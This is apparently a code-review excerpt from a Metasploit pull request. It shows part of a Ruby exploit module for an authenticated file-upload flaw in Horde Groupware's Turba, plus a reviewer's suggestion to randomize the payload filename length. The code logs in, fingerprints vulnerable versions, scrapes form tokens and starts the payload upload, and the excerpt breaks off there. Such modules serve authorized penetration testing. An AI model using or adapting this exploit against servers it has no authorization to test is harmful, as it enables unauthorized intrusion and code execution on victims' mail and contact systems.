modules/exploits/multi/http/horde_turba_file_upload.rb

```diff
@@ -0,0 +1,182 @@
+        OptString.new('USERNAME',   [true, 'The username to authenticate with']),
+        OptString.new('PASSWORD',   [true, 'The password to authenticate with'])
+      ])
+  end
+
+  def check
+    vprint_status("Authenticating using #{username}:#{password}")
+    cookie = horde_login(username, password)
+    return Exploit::CheckCode::Unknown unless cookie
+
+    res = send_request_cgi(
+      'method'      => 'GET',
+      'uri'         => normalize_uri(target_uri, '/turba/add.php'),
+      'cookie'      => cookie
+    )
+
+    if res && res.code == 200
+    if res.body.include?('Groupware 5.2.22') || res.body.include?('Groupware 5.2.17')
+    return Exploit::CheckCode::Vulnerable
+      end
+      return Exploit::CheckCode::Appears
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def horde_login(user, pass)
+    res = send_request_cgi(
+      'method'      => 'GET',
+      'uri'         => normalize_uri(target_uri, 'login.php')
+    )
+
+    fail_with(Failure::Unreachable, 'No response received from the target.') unless res
+
+    session_cookie = res.get_cookies
+    vprint_status("Logging in...")
+    res = send_request_cgi(
+      'method'      => 'POST',
+      'uri'         => normalize_uri(target_uri, 'login.php'),
+      'cookie'      => session_cookie,
+      'vars_post'   => {
+        'horde_user'  => user,
+        'horde_pass'  => pass,
+        'login_post'    => '1'
+      }
+    )
+
+    return res.get_cookies if res && res.code == 302
+    nil
+  end
+
+  def get_tokens(cookie)
+    res = send_request_cgi(
+      'method'      => 'GET',
+      'uri'         => normalize_uri(target_uri, 'turba', 'add.php'),
+      'cookie'      => cookie
+    )
+
+    if res && res.code == 200
+      if res.body.scan /turba\/add\.php\?source=(.+)"/
+          source_token = Regexp.last_match.to_a[1..-1].find{|x| x != "favourites" }
+
+      if res.body =~ /name="turba_form_addcontact_formToken" value="(.+)"/
+        form_token = Regexp.last_match[1]
+        return source_token, form_token, res.get_cookies
+      end
+      end
+    end
+    nil
+  end
+
+  def exploit
+    vprint_status("Authenticating using #{username}:#{password}")
+
+    cookie = horde_login(username, password)
+    fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?
+    vprint_good("Authenticated to Horde.")
+
+    tokens = get_tokens(cookie)
+    fail_with(Failure::Unknown, 'Error extracting tokens.') if tokens.nil?
+    source_token, form_token, secret_cookie = tokens
+
+    vprint_good("Tokens \"#{source_token}\", \"#{form_token}\", and cookie \"#{secret_cookie}\" found.")
+
+    targets[1..-1].each do |curr_target|
+
+    if target.name =~ /Automatic/ or curr_target == target
+
+      payload_name = Rex::Text.rand_text_alpha_lower(10)
```

Comment:
Optionally, randomize the filename length:

```suggestion
      payload_name = Rex::Text.rand_text_alpha_lower(10..12)
```